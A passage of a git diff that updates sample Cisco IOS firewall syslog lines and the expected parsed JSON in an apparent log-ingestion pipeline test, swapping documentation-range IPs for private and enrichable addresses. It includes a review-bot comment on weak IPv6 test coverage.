02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(54309) -> 192.168.100.255(15600), 1 packet +Jun 20 02:42:28 192.168.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets +Jun 20 02:42:34 192.168.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(43989) -> 192.168.100.255(15600), 1 packet +Jun 20 02:43:09 192.168.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59832) -> 81.2.69.144(80), 1 packet +Jun 20 02:43:29 192.168.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets +Jun 20 02:43:29 192.168.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 192.168.100.12 -> 192.168.100.1 (3/3), 32 packets +Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59834) -> 81.2.69.144(80), 1 packet +Mar 24 18:06:03 192.168.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021 +Mar 24 18:06:00 192.168.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9) +Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3 +Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3 +Mar 24 12:09:35 192.168.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0 +Mar 24 12:06:47 192.168.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 
19 \ No newline at end of file diff --git a/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log-expected.json b/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log-expected.json index 09ff64b5582..d24b33ae03d 100644 --- a/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log-expected.json +++ b/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log-expected.json @@ -4,7 +4,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { @@ -13,15 +13,15 @@ }, "source": { "packets": 1, - "address": "198.51.100.197", - "ip": "198.51.100.197" + "address": "192.168.100.197", + "ip": "192.168.100.197" }, - "message": "list 177 denied igmp 198.51.100.197 -\u003e 224.0.0.22, 1 packet", + "message": "list 177 denied igmp 192.168.100.197 -\u003e 224.0.0.22, 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Rt5RGlrNED3cg8Wokm4+KGsDz+4=", + "community_id": "1:NCx7UOZoQUvxIB+uzqMmGnZTSzI=", "transport": "igmp", "type": "ipv4", "packets": 1 @@ -31,15 +31,15 @@ }, "related": { "ip": [ - "198.51.100.197", + "192.168.100.197", "224.0.0.22" ] }, "event": { "severity": 6, "sequence": 585917, - "ingested": "2021-07-19T09:06:56.360370014Z", - "original": "Feb 8 04:00:48 198.51.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 198.51.100.197 -\u003e 224.0.0.22, 1 packet", + "ingested": "2021-12-09T13:33:17.492482Z", + "original": "Feb 8 04:00:48 192.168.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 192.168.100.197 -\u003e 224.0.0.22, 1 packet", "code": "IPACCESSLOGRP", "provider": "firewall", "action": "deny", @@ -57,7 +57,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { 
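Review bot: The IPv6 sample on the `+May 3 19:11:33` line uses `2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6` as both source and destination, with the same weakness as the FTD malware-site sample: in the expected output (`@@ -165,26` and `@@ -194,15` hunks further down) `source` and `destination` get identical geo and AS enrichment and `related.ip` shrinks to a single element, so a swapped field mapping would pass unnoticed. Giving the destination a second address from the supported subset, `<SECOND_SUPPORTED_IPV6>`, would restore that coverage. The IPv4 lines also move the reporting device and its peers from the RFC 5737 documentation range `198.51.100.0/24` to the RFC 1918 range `192.168.100.0/24`; the diff does not say why the already non-routable documentation range needed replacing, and if the intent is "guaranteed no enrichment" that deserves a sentence in the PR description so a later cleanup does not move them back.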
@@ -66,15 +66,15 @@ }, "source": { "packets": 1, - "address": "198.51.100.2", - "ip": "198.51.100.2" + "address": "192.168.100.2", + "ip": "192.168.100.2" }, - "message": "list INBOUND-ON-F11 denied igmp 198.51.100.2 -\u003e 224.0.0.2 (20), 1 packet", + "message": "list INBOUND-ON-F11 denied igmp 192.168.100.2 -\u003e 224.0.0.2 (20), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:gg8i3117u+0XZ7S0E0dl04HE4qw=", + "community_id": "1:eM790E01lXKYULfDPBPP0umazRw=", "transport": "igmp", "type": "ipv4", "packets": 1 @@ -87,15 +87,15 @@ }, "related": { "ip": [ - "198.51.100.2", + "192.168.100.2", "224.0.0.2" ] }, "event": { "severity": 6, "sequence": 585918, - "ingested": "2021-07-19T09:06:56.360375335Z", - "original": "Feb 9 04:00:48 198.51.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 198.51.100.2 -\u003e 224.0.0.2 (20), 1 packet", + "ingested": "2021-12-09T13:33:17.492489100Z", + "original": "Feb 9 04:00:48 192.168.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 192.168.100.2 -\u003e 224.0.0.2 (20), 1 packet", "code": "IPACCESSLOGSP", "provider": "firewall", "action": "deny", @@ -113,7 +113,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { @@ -122,10 +122,10 @@ }, "source": { "packets": 1, - "address": "198.51.100.1", - "ip": "198.51.100.1" + "address": "192.168.100.1", + "ip": "192.168.100.1" }, - "message": "list 171 denied 0 198.51.100.1 -\u003e 255.255.255.255, 1 packet", + "message": "list 171 denied 0 192.168.100.1 -\u003e 255.255.255.255, 1 packet", "tags": [ "preserve_original_event" ], 
@@ -139,15 +139,15 @@ }, "related": { "ip": [ - "198.51.100.1", + "192.168.100.1", "255.255.255.255" ] }, "event": { "severity": 6, "sequence": 585919, - "ingested": "2021-07-19T09:06:56.360377543Z", - "original": "Feb 10 04:00:48 198.51.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 198.51.100.1 -\u003e 255.255.255.255, 1 packet", + "ingested": "2021-12-09T13:33:17.492495400Z", + "original": "Feb 10 04:00:48 192.168.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 192.168.100.1 -\u003e 255.255.255.255, 1 packet", "code": "IPACCESSLOGNP", "provider": "firewall", "action": "deny", 
@@ -165,26 +165,56 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "destination": {
+ "geo": {
+ "continent_name": "Europe",
+ "country_name": "Denmark",
+ "location": {
+ "lon": 10.0,
+ "lat": 56.0
+ },
+ "country_iso_code": "DK"
+ },
+ "as": {
+ "number": 62121,
+ "organization": {
+ "name": "Christian Ebsen ApS"
+ }
+ },
+ "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "port": 22,
- "address": "2001:DB8:1000::1",
- "ip": "2001:DB8:1000::1"
+ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"
 },
 "source": {
- "address": "2001:DB8::3",
+ "geo": {
+ "continent_name": "Europe",
+ "country_name": "Denmark",
+ "location": {
+ "lon": 10.0,
+ "lat": 56.0
+ },
+ "country_iso_code": "DK"
+ },
+ "as": {
+ "number": 62121,
+ "organization": {
+ "name": "Christian Ebsen ApS"
+ }
+ },
+ "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "port": 1027,
 "packets": 9,
- "ip": "2001:DB8::3"
+ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"
 },
- "message": "list ACL-IPv6-E0/0-IN/10 permitted tcp 2001:DB8::3(1027) -\u003e 2001:DB8:1000::1(22), 9 packets",
+ "message": "list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -\u003e 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets",
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:MFLZEQR2gBCpxJEXRvaB0jjkxNA=",
+ "community_id": "1:BI3p2ifMfqVkYuAqbGRcjozcbnA=",
 "transport": "tcp",
 "type": "ipv6",
 "packets": 9
@@ -194,15 +224,14 @@ }, "related": { "ip": [ - "2001:DB8::3", - "2001:DB8:1000::1" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { "severity": 6, "sequence": 585920, - "ingested": "2021-07-19T09:06:56.360379550Z", - "original": "May 3 19:11:33 198.51.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2001:DB8::3(1027) -\u003e 2001:DB8:1000::1(22), 9 packets", + "ingested": "2021-12-09T13:33:17.492501Z", + "original": "May 3 19:11:33 192.168.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -\u003e 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets", "code": "ACCESSLOGP", "provider": "firewall", "action": "allow", @@ -220,26 +249,26 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { "port": 15600, - "address": "198.51.100.255", - "ip": "198.51.100.255" + "address": "192.168.100.255", + "ip": "192.168.100.255" }, "source": { - "address": "198.51.100.195", + "address": "192.168.100.195", "port": 55250, "packets": 1, - "ip": "198.51.100.195" + "ip": "192.168.100.195" }, - "message": "list 177 denied udp 198.51.100.195(55250) -\u003e 198.51.100.255(15600), 1 packet", + "message": "list 177 denied udp 192.168.100.195(55250) -\u003e 192.168.100.255(15600), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:7qvTEOLkmhTrK1y9mKNwCENQbeU=", + "community_id": "1:StJhZzrkK7s6tPeVb3BmxbE0NZ0=", "transport": "udp", "type": "ipv4", "packets": 1 
@@ -249,15 +278,15 @@ }, "related": { "ip": [ - "198.51.100.195", - "198.51.100.255" + "192.168.100.195", + "192.168.100.255" ] }, "event": { "severity": 6, "sequence": 1663303, - "ingested": "2021-07-19T09:06:56.360381464Z", - "original": "Jun 20 02:41:40 198.51.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(55250) -\u003e 198.51.100.255(15600), 1 packet", + "ingested": "2021-12-09T13:33:17.492506500Z", + "original": "Jun 20 02:41:40 192.168.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(55250) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", "action": "deny", @@ -275,19 +304,19 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { - "address": "198.51.100.2", - "ip": "198.51.100.2" + "address": "192.168.100.2", + "ip": "192.168.100.2" }, "source": { "packets": 1, - "address": "198.51.100.1", - "ip": "198.51.100.1" + "address": "192.168.100.1", + "ip": "192.168.100.1" }, - "message": "list 151 denied icmp 198.51.100.1 -\u003e 198.51.100.2 (3/4), 1 packet", + "message": "list 151 denied icmp 192.168.100.1 -\u003e 192.168.100.2 (3/4), 1 packet", "icmp": { "type": "3", "code": "4" @@ -296,7 +325,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:9lO0Kj0TpXAVNWuiPRAyFAGtCqM=", + "community_id": "1:qFmXhpjtK+/aneNSpMgRiI7dwi4=", "transport": "icmp", "type": "ipv4", "packets": 1 
@@ -306,15 +335,15 @@ }, "related": { "ip": [ - "198.51.100.1", - "198.51.100.2" + "192.168.100.1", + "192.168.100.2" ] }, "event": { "severity": 6, "sequence": 1663304, - "ingested": "2021-07-19T09:06:56.360387855Z", - "original": "Jun 20 02:41:45 198.51.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 198.51.100.1 -\u003e 198.51.100.2 (3/4), 1 packet", + "ingested": "2021-12-09T13:33:17.492511400Z", + "original": "Jun 20 02:41:45 192.168.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 192.168.100.1 -\u003e 192.168.100.2 (3/4), 1 packet", "code": "IPACCESSLOGDP", "provider": "firewall", "action": "deny", @@ -332,26 +361,26 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { "port": 15600, - "address": "198.51.100.255", - "ip": "198.51.100.255" + "address": "192.168.100.255", + "ip": "192.168.100.255" }, "source": { - "address": "198.51.100.195", + "address": "192.168.100.195", "port": 54309, "packets": 1, - "ip": "198.51.100.195" + "ip": "192.168.100.195" }, - "message": "list 177 denied udp 198.51.100.195(54309) -\u003e 198.51.100.255(15600), 1 packet", + "message": "list 177 denied udp 192.168.100.195(54309) -\u003e 192.168.100.255(15600), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:UaC2rOjKSQBEmX+jEyiQatg9eGI=", + "community_id": "1:l5C5fxVKRjXx6kz2MZOPm+0MjuU=", "transport": "udp", "type": "ipv4", "packets": 1 
@@ -361,15 +390,15 @@
 },
 "related": {
 "ip": [
- "198.51.100.195",
- "198.51.100.255"
+ "192.168.100.195",
+ "192.168.100.255"
 ]
 },
 "event": {
 "severity": 6,
 "sequence": 1663312,
- "ingested": "2021-07-19T09:06:56.360389813Z",
- "original": "Jun 20 02:42:28 198.51.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(54309) -\u003e 198.51.100.255(15600), 1 packet",
+ "ingested": "2021-12-09T13:33:17.492514700Z",
+ "original": "Jun 20 02:42:28 192.168.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(54309) -\u003e 192.168.100.255(15600), 1 packet",
 "code": "IPACCESSLOGP",
 "provider": "firewall",
 "action": "deny",
@@ -390,14 +419,14 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "event": {
 "severity": 6,
 "sequence": 1663313,
- "ingested": "2021-07-19T09:06:56.360391731Z",
- "original": "Jun 20 02:42:28 198.51.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets",
+ "ingested": "2021-12-09T13:33:17.492519Z",
+ "original": "Jun 20 02:42:28 192.168.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets",
 "code": "IPACCESSLOGRL",
 "provider": "firewall",
 "category": "network",
@@ -417,26 +446,26 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "destination": {
 "port": 15600,
- "address": "198.51.100.255",
- "ip": "198.51.100.255"
+ "address": "192.168.100.255",
+ "ip": "192.168.100.255"
 },
 "source": {
- "address": "198.51.100.195",
+ "address": "192.168.100.195",
 "port": 43989,
 "packets": 1,
- "ip": "198.51.100.195"
+ "ip": "192.168.100.195"
 },
- "message": "list 177 denied udp 198.51.100.195(43989) -\u003e 198.51.100.255(15600), 1 packet",
+ "message": "list 177 denied udp 192.168.100.195(43989) -\u003e 192.168.100.255(15600), 1 packet",
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:CdrzBOQ6Cohqy+Mgg9EZnl1nHFs=",
+ "community_id": "1:qEu4RGH+VDqSvCYBmcpiipbHIFc=",
 "transport": "udp",
 "type": "ipv4",
 "packets": 1
@@ -446,15 +475,15 @@
 },
 "related": {
 "ip": [
- "198.51.100.195",
- "198.51.100.255"
+ "192.168.100.195",
+ "192.168.100.255"
 ]
 },
 "event": {
 "severity": 6,
 "sequence": 1663314,
- "ingested": "2021-07-19T09:06:56.360393643Z",
- "original": "Jun 20 02:42:34 198.51.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(43989) -\u003e 198.51.100.255(15600), 1 packet",
+ "ingested": "2021-12-09T13:33:17.492524100Z",
+ "original": "Jun 20 02:42:34 192.168.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(43989) -\u003e 192.168.100.255(15600), 1 packet",
 "code": "IPACCESSLOGP",
 "provider": "firewall",
 "action": "deny",
@@ -472,41 +501,44 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "172.217.10.46",
+ "address": "81.2.69.144",
 "port": 80,
- "ip": "172.217.10.46"
+ "ip": "81.2.69.144"
 },
 "source": {
- "address": "198.51.100.12",
+ "address": "192.168.100.12",
 "port": 59832,
 "packets": 1,
- "ip": "198.51.100.12"
+ "ip": "192.168.100.12"
 },
- "message": "list 150 denied tcp 198.51.100.12(59832) -\u003e 172.217.10.46(80), 1 packet",
+ "message": "list 150 denied tcp 192.168.100.12(59832) -\u003e 81.2.69.144(80), 1 packet",
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:VrawQ+fBZ7zfHStQfvTOW1zQANA=",
+ "community_id": "1:KHXR26FFI5fAjbqPIM0o9njIDr0=",
 "transport": "tcp",
 "type": "ipv4",
 "packets": 1
@@ -516,15 +548,15 @@
 },
 "related": {
 "ip": [
- "198.51.100.12",
- "172.217.10.46"
+ "192.168.100.12",
+ "81.2.69.144"
 ]
 },
 "event": {
 "severity": 6,
 "sequence": 1663321,
- "ingested": "2021-07-19T09:06:56.360395532Z",
- "original": "Jun 20 02:43:09 198.51.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59832) -\u003e 172.217.10.46(80), 1 packet",
+ "ingested": "2021-12-09T13:33:17.492528800Z",
+ "original": "Jun 20 02:43:09 192.168.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59832) -\u003e 81.2.69.144(80), 1 packet",
 "code": "IPACCESSLOGP",
 "provider": "firewall",
 "action": "deny",
@@ -545,14 +577,14 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "event": {
 "severity": 6,
 "sequence": 1663325,
- "ingested": "2021-07-19T09:06:56.360397394Z",
- "original": "Jun 20 02:43:29 198.51.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets",
+ "ingested": "2021-12-09T13:33:17.492532600Z",
+ "original": "Jun 20 02:43:29 192.168.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets",
 "code": "IPACCESSLOGRL",
 "provider": "firewall",
 "category": "network",
@@ -572,19 +604,19 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "destination": {
- "address": "198.51.100.1",
- "ip": "198.51.100.1"
+ "address": "192.168.100.1",
+ "ip": "192.168.100.1"
 },
 "source": {
 "packets": 32,
- "address": "198.51.100.12",
- "ip": "198.51.100.12"
+ "address": "192.168.100.12",
+ "ip": "192.168.100.12"
 },
- "message": "list 150 denied icmp 198.51.100.12 -\u003e 198.51.100.1 (3/3), 32 packets",
+ "message": "list 150 denied icmp 192.168.100.12 -\u003e 192.168.100.1 (3/3), 32 packets",
 "icmp": {
 "type": "3",
 "code": "3"
@@ -593,7 +625,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:huj4hjTG/rbN+R5GhpV6YHP1sYM=",
+ "community_id": "1:iJX04o1L7tLCbqhG80H5P/Nx4FY=",
 "transport": "icmp",
 "type": "ipv4",
 "packets": 32
@@ -603,15 +635,15 @@
 },
 "related": {
 "ip": [
- "198.51.100.12",
- "198.51.100.1"
+ "192.168.100.12",
+ "192.168.100.1"
 ]
 },
 "event": {
 "severity": 6,
 "sequence": 1663326,
- "ingested": "2021-07-19T09:06:56.360399550Z",
- "original": "Jun 20 02:43:29 198.51.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 198.51.100.12 -\u003e 198.51.100.1 (3/3), 32 packets",
+ "ingested": "2021-12-09T13:33:17.492537400Z",
+ "original": "Jun 20 02:43:29 192.168.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 192.168.100.12 -\u003e 192.168.100.1 (3/3), 32 packets",
 "code": "IPACCESSLOGDP",
 "provider": "firewall",
 "action": "deny",
@@ -629,41 +661,44 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "172.217.10.46",
+ "address": "81.2.69.144",
 "port": 80,
- "ip": "172.217.10.46"
+ "ip": "81.2.69.144"
 },
 "source": {
- "address": "198.51.100.12",
+ "address": "192.168.100.12",
 "port": 59834,
 "packets": 1,
- "ip": "198.51.100.12"
+ "ip": "192.168.100.12"
 },
- "message": "list 150 denied tcp 198.51.100.12(59834) -\u003e 172.217.10.46(80), 1 packet",
+ "message": "list 150 denied tcp 192.168.100.12(59834) -\u003e 81.2.69.144(80), 1 packet",
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:5enMmUgQViWG28IC5W6/9cYJ6EA=",
+ "community_id": "1:Nww0Z+gJpZXiHgUEpOLnoLROtqw=",
 "transport": "tcp",
 "type": "ipv4",
 "packets": 1
@@ -673,15 +708,15 @@
 },
 "related": {
 "ip": [
- "198.51.100.12",
- "172.217.10.46"
+ "192.168.100.12",
+ "81.2.69.144"
 ]
 },
 "event": {
 "severity": 6,
 "sequence": 1663327,
- "ingested": "2021-07-19T09:06:56.360401431Z",
- "original": "Jun 20 02:43:30 198.51.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59834) -\u003e 172.217.10.46(80), 1 packet",
+ "ingested": "2021-12-09T13:33:17.492542900Z",
+ "original": "Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59834) -\u003e 81.2.69.144(80), 1 packet",
 "code": "IPACCESSLOGP",
 "provider": "firewall",
 "action": "deny",
@@ -699,7 +734,7 @@
 "log": {
 "level": "notification",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "destination": {
@@ -733,8 +768,8 @@
 "event": {
 "severity": 5,
 "sequence": 1991219,
- "ingested": "2021-07-19T09:06:56.360403294Z",
- "original": "Mar 24 18:06:03 198.51.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021",
+ "ingested": "2021-12-09T13:33:17.492547Z",
+ "original": "Mar 24 18:06:03 192.168.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021",
 "code": "LOGIN_SUCCESS",
 "provider": "firewall",
 "category": "network",
@@ -762,7 +797,7 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "source": {
@@ -776,8 +811,8 @@
 "event": {
 "severity": 6,
 "sequence": 1991220,
- "ingested": "2021-07-19T09:06:56.360405194Z",
- "original": "Mar 24 18:06:00 198.51.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9)",
+ "ingested": "2021-12-09T13:33:17.492551Z",
+ "original": "Mar 24 18:06:00 192.168.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9)",
 "code": "LOGOUT",
 "provider": "firewall",
 "category": "network",
@@ -804,7 +839,7 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "destination": {
@@ -835,8 +870,8 @@
 "severity": 6,
 "sequence": 1991221,
 "reason": "Invalid RP",
- "ingested": "2021-07-19T09:06:56.360407101Z",
- "original": "Mar 24 17:37:39 198.51.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3",
+ "ingested": "2021-12-09T13:33:17.492554300Z",
+ "original": "Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3",
 "code": "INVALID_RP_JOIN",
 "provider": "firewall",
 "action": "multicast-join",
@@ -861,7 +896,7 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "destination": {
@@ -892,8 +927,8 @@
 "severity": 6,
 "sequence": 1991221,
 "reason": "Invalid RP",
- "ingested": "2021-07-19T09:06:56.360409151Z",
- "original": "Mar 24 17:37:39 198.51.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3",
+ "ingested": "2021-12-09T13:33:17.492559100Z",
+ "original": "Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3",
 "code": "INVALID_RP_JOIN",
 "provider": "firewall",
 "action": "multicast-join",
@@ -924,14 +959,14 @@
 "log": {
 "level": "warning",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "event": {
 "severity": 4,
 "sequence": 1991217,
- "ingested": "2021-07-19T09:06:56.360411008Z",
- "original": "Mar 24 12:09:35 198.51.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0",
+ "ingested": "2021-12-09T13:33:17.492564400Z",
+ "original": "Mar 24 12:09:35 192.168.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0",
 "code": "NOVALIDKEY",
 "provider": "firewall",
 "category": "network",
@@ -954,14 +989,14 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "event": {
 "severity": 6,
 "sequence": 1991218,
- "ingested": "2021-07-19T09:06:56.360413029Z",
- "original": "Mar 24 12:06:47 198.51.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19",
+ "ingested": "2021-12-09T13:33:17.492569200Z",
